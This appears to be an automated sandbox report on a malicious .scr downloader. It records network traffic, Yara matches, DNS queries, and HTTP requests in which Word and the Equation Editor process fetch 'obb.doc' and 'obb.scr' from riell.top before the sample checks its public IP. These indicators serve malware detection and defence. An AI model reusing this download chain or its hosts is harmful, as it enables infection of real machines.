Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

May check the online IP address of the machine

Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr	DNS query: name: reallyfreegeoip.org

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /obb.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: riell.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /obb.scr HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FFDE4C25-701B-4F27-93CB-2693CC173C87}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /obb.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: riell.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /obb.scr HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: riell.top
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002497000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: obi23456.scr, 0000000A.00000002.897811172.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002497000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: obi23456.scr, 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.898671670.0000000005A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.898671670.0000000005A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000240E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
